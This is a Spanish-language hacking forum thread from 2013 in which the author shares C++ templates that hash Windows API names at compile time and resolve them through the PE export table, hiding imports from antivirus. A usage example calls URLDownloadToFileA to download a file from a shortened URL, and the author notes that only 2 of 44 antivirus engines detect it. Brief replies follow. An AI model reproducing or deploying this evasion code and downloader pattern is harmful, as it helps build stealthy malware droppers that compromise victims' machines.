elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  [C++ Template] Hasheado de APIs en compile-time - Invoke
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [C++ Template] Hasheado de APIs en compile-time - Invoke  (Leído 3,424 veces)
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
[C++ Template] Hasheado de APIs en compile-time - Invoke
« en: 24 Enero 2013, 18:28 pm »

Código
  1. #ifndef CRYPTAPI
  2. #define CRYPTAPI
  3.  
  4. struct FNV1a{
  5.    template <size_t N>
  6.    __forceinline static DWORD hash(const char (&str)[N]){
  7.        return (hash<N-1>((const char(&)[N-1])str)^str[N-1]) * 16777619u;
  8.    };
  9.  
  10.    template <>
  11.    __forceinline static DWORD hash<1>(const char (&str)[1]){
  12.        return (2166136261u^str[0]) * 16777619u;
  13.    };
  14.  
  15.    __forceinline static DWORD hash(char* str){
  16.        DWORD r = 2166136261u;
  17.  
  18.        do{
  19.            r ^= *str;
  20.            r *= 16777619u;
  21.        }while(*str++);
  22.  
  23.        return r;
  24.    };
  25. };
  26.  
  27. struct CUSTOM{
  28.    template <size_t N>
  29.    __forceinline static DWORD hash(const char (&str)[N]){
  30.        return ((hash<N-1>((const char(&)[N-1])str) ^ (str[N-1] << 24)) >> 2);
  31.    };
  32.  
  33.    template <>
  34.    __forceinline static DWORD hash<1>(const char (&str)[1]){
  35.        return (str[0]<<24)>>2;
  36.    };
  37.  
  38.    __forceinline static DWORD hash(char* str){
  39.        DWORD r = 0;
  40.  
  41.        do{
  42.            r ^= (*str << 24);
  43.            r >>= 2;
  44.        }while(*str++);
  45.  
  46.        return r;
  47.    };
  48. };
  49.  
  50. template <class ret, class hashFnc = FNV1a> class invoke{
  51. private:
  52.    char*   base;
  53.    DWORD   FuncHash;
  54. public:
  55.    template <size_t N, size_t M>
  56.    invoke(const char (&DLL)[N], const char (&Func)[M]){
  57.        base = (char*)LoadLibraryA(DLL);
  58.        FuncHash = hashFnc::hash<M>(Func);
  59.    };
  60.  
  61.    ret operator()(int numArgs, ...){
  62.        BYTE*                       dirApi;
  63.        IMAGE_DOS_HEADER*           IDH         = (IMAGE_DOS_HEADER*)base;
  64.        IMAGE_NT_HEADERS*           INH         = (IMAGE_NT_HEADERS*)(base + IDH->e_lfanew);
  65.        IMAGE_OPTIONAL_HEADER*      IOH         = &INH->OptionalHeader;
  66.        IMAGE_DATA_DIRECTORY*       IDE         = (IMAGE_DATA_DIRECTORY*)(&IOH->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]);
  67.        IMAGE_EXPORT_DIRECTORY*     IED         = (IMAGE_EXPORT_DIRECTORY *)(base + IDE->VirtualAddress);
  68.  
  69.        void**                      FTABLE      = (void **)(base + IED->AddressOfFunctions);
  70.        WORD*                       OTABLE      = (WORD *)(base + IED->AddressOfNameOrdinals);
  71.        char**                      NTABLE      = (char **)(base + IED->AddressOfNames);
  72.  
  73.        for (DWORD i = 0; i <= IED->NumberOfNames; i++){
  74.            if (hashFnc::hash(base + (DWORD)NTABLE[i]) == FuncHash){
  75.                dirApi = (BYTE*)(base + (DWORD)FTABLE[OTABLE[i]]);
  76.                break;
  77.            }
  78.        }
  79.        va_list listaArgs;
  80.        void**  args;
  81.  
  82.        va_start(listaArgs, numArgs);
  83.        args = &va_arg(listaArgs, void*);
  84.  
  85.        for(int n=numArgs-1; n>=0; n--){
  86.            void* temp = args[n];
  87.            __asm
  88.                push [temp]
  89.        }
  90.        va_end(listaArgs);
  91.  
  92.        __asm
  93.            call dirApi
  94.    };
  95. };
  96. #endif

Forma de realizar la llamada:
Código:
invoke<%TIPO_DE_RETORNO%,%ALGORITMO_USADO%>(%NOMBRE_DLL%,%NOMBRE_FUNCION%)(%N_PARAMETROS%,%PARAMETRO1%,%PARAMETRO2%,...,%PARAMETRON%);

Ejemplo de uso:
Código
  1. #pragma comment(linker,"/ENTRY:main")
  2.  
  3. #include <Windows.h>
  4. #include "cryptAPI.hpp"
  5.  
  6. void main(){
  7.    invoke<void, FNV1a>("URLMON", "URLDownloadToFileA")(5, 0, "http://goo.gl/veps2", "C:/test.png", 0, 0);
  8.    invoke<BOOL, FNV1a>("KERNEL32", "ExitProcess")(1, 0);
  9. }
2/44 AV lo detectan... Nada mal teniendo en cuenta que ni URLMON ni http:// va ofuscado/cifrado.


Thread original:
Código:
http://foro.h-sec.org/programacion/(template)-cryptapi-cifra-la-llamada-a-las-apis-d
En línea

Arkangel_0x7C5


Desconectado Desconectado

Mensajes: 361



Ver Perfil
Re: [C++ Template] Hasheado de APIs en compile-time - Invoke
« Respuesta #1 en: 24 Enero 2013, 20:43 pm »

Buen código, aunque yo sigo prefiriendo usar punteros a funciones previamente declarados.

Mas que otra cosa porque es un poco engorroso la manera d hacer la llamada.

Saludos
En línea

Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: [C++ Template] Hasheado de APIs en compile-time - Invoke
« Respuesta #2 en: 24 Enero 2013, 21:24 pm »

Para pocas funciones yo también prefiero usar typedefs y trabajar con los punteros.... Y mira mi último post en h-Sec :-*
« Última modificación: 24 Enero 2013, 22:13 pm por Karcrack » En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: [C++ Template] Hasheado de APIs en compile-time - Invoke
« Respuesta #3 en: 24 Enero 2013, 22:08 pm »

Y mira mi último post en h-Sec :-*
spam?  :silbar:
En línea

Te vendería mi talento por poder dormir tranquilo.
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: [C++ Template] Hasheado de APIs en compile-time - Invoke
« Respuesta #4 en: 24 Enero 2013, 22:13 pm »

@Shell Root: Más bien sería no abrir el chat para hablar con Ark :laugh:
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Introduccion a APIs y como evitar el uso de MSWINSCK.OCX con APIs
Programación Visual Basic
Achernar 5 4,982 Último mensaje 5 Julio 2007, 23:43 pm
por Achernar
[ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas « 1 2 3 »
Programación Visual Basic
Karcrack 26 21,109 Último mensaje 2 Noviembre 2011, 20:03 pm
por Karcrack
[C++][?]Crear un archivo que compile los codigos
Programación C/C++
anonimo12121 2 2,315 Último mensaje 4 Febrero 2011, 15:57 pm
por anonimo12121
[HELP] Invoke APIs
Programación Visual Basic
Swellow 1 1,730 Último mensaje 4 Mayo 2012, 10:01 am
por Swellow
[HELP] Invoke API's
Programación Visual Basic
Swellow 4 1,873 Último mensaje 24 Noviembre 2012, 17:58 pm
por Swellow
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines